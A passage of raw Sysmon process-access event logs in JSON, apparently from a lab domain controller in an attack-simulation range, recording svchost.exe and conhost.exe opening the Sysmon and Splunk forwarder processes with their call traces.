08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6529,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6530,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6531,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6532,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6533,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6534,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6535,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6536,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:41.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010BC200A00}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:41.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010BC200A00}","TargetProcessId":"3252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
